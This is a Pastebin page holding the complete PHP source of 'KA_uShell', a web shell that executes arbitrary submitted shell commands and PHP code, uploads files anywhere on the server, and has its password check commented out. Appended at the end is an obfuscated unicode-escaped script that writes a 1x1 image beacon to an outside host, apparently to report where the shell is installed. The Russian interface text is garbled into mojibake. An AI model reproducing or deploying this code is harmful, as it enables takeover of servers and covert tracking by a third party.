Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!--
- /+--------------------------------+\
- | KA_uShell |
- | <KAdot Universal Shell> |
- | Version 0.1.6 |
- | 13.03.04 |
- | Author: KAdot <KAdot@ngs.ru> |
- |--------------------------------|
- \+ +/
- -->
- <html>
- <head>
- <title>KA_uShell 0.1.6</title>
- <style type="text/css">
- <!--
- body, table{font-family:Verdana; font-size:12px;}
- table {background-color:#EAEAEA; border-width:0px;}
- b {font-family:Arial; font-size:15px;}
- a{text-decoration:none;}
- -->
- </style>
- </head>
- <body>
- <?php
- $self = $_SERVER['PHP_SELF'];
- $docr = $_SERVER['DOCUMENT_ROOT'];
- $sern = $_SERVER['SERVER_NAME'];
- $tend = "</tr></form></table><br><br><br><br>";
- // Configuration
- $login = "admin";
- $pass = "123";
- /*/ Authentication
- if (!isset($_SERVER['PHP_AUTH_USER'])) {
- header('WWW-Authenticate: Basic realm="KA_uShell"');
- header('HTTP/1.0 401 Unauthorized');
- exit;}
- else {
- if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
- { echo "×òî íàäî?"; exit;}
- }
- */
- if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
- elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
- else {$ac = "shell";}
- // Menu
- echo "
- |<a href=$self?ac=shell>Shell</a>|
- |<a href=$self?ac=upload>File Upload</a>|
- |<a href=$self?ac=tools>Tools</a>|
- |<a href=$self?ac=eval>PHP Eval Code</a>|
- |<a href=$self?ac=whois>Whois</a>|
- <br><br><br><pre>";
- switch($ac) {
- // Shell
- case "shell":
- echo <<<HTML
- <b>Shell</b>
- <table>
- <form action="$self" method="POST">
- <input type="hidden" name="ac" value="shell">
- <tr><td>
- $$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
- </td></tr>
- <tr><td>
- <textarea cols="100" rows="25">
- HTML;
- if (!empty($_POST['c'])){
- passthru($_POST['c']);
- }
- echo "</textarea></td>$tend";
- break;
- //PHP Eval Code execution
- case "eval":
- echo <<<HTML
- <b>PHP Eval Code</b>
- <table>
- <form method="POST" action="$self">
- <input type="hidden" name="ac" value="eval">
- <tr>
- <td><textarea name="ephp" rows="10" cols="60"></textarea></td>
- </tr>
- <tr>
- <td><input type="submit" value="Enter"></td>
- $tend
- HTML;
- if (isset($_POST['ephp'])){
- eval($_POST['ephp']);
- }
- break;
- //Text tools
- case "tools":
- echo <<<HTML
- <b>Tools</b>
- <table>
- <form method="POST" action="$self">
- <input type="hidden" name="ac" value="tools">
- <tr>
- <td>
- <input type="radio" name="tac" value="1">B64 Decode<br>
- <input type="radio" name="tac" value="2">B64 Encode<br><hr>
- <input type="radio" name="tac" value="3">md5 Hash
- </td>
- <td><textarea name="tot" rows="5" cols="42"></textarea></td>
- </tr>
- <tr>
- <td> </td>
- <td><input type="submit" value="Enter"></td>
- $tend
- HTML;
- if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
- switch($_POST['tac']) {
- case "1":
- echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
- break;
- case "2":
- echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
- break;
- case "3":
- echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
- break;
- }}
- break;
- // Uploading
- case "upload":
- echo <<<HTML
- <b>File Upload</b>
- <table>
- <form enctype="multipart/form-data" action="$self" method="POST">
- <input type="hidden" name="ac" value="upload">
- <tr>
- <td>Ôàéëî:</td>
- <td><input size="48" name="file" type="file"></td>
- </tr>
- <tr>
- <td>Ïàïêà:</td>
- <td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
- $tend
- HTML;
- if (isset($_POST['path'])){
- $uploadfile = $_POST['path'].$_FILES['file']['name'];
- if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
- echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
- echo "Èìÿ:" .$_FILES['file']['name']. "\n";
- echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
- } else {
- print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
- print_r($_FILES);
- }
- }
- break;
- // Whois
- case "whois":
- echo <<<HTML
- <b>Whois</b>
- <table>
- <form action="$self" method="POST">
- <input type="hidden" name="ac" value="whois">
- <tr>
- <td>Äîìåí:</td>
- <td><input size="40" type="text" name="wq"></td>
- </tr>
- <tr>
- <td>Õóéç ñåðâåð:</td>
- <td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
- </tr>
- <tr><td>
- <input align="right" type="submit" value="Enter">
- </td></tr>
- $tend
- HTML;
- if (isset($_POST['wq']) && $_POST['wq']<>"") {
- if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
- $querty = $_POST['wq']."\r\n";
- $fp = fsockopen($wser, 43);
- if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
- fputs($fp, $querty);
- while(!feof($fp)){echo fgets($fp, 4000);}
- fclose($fp);
- }}
- break;
- }
- ?>
- </pre>
- </body>
- </html>
- <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement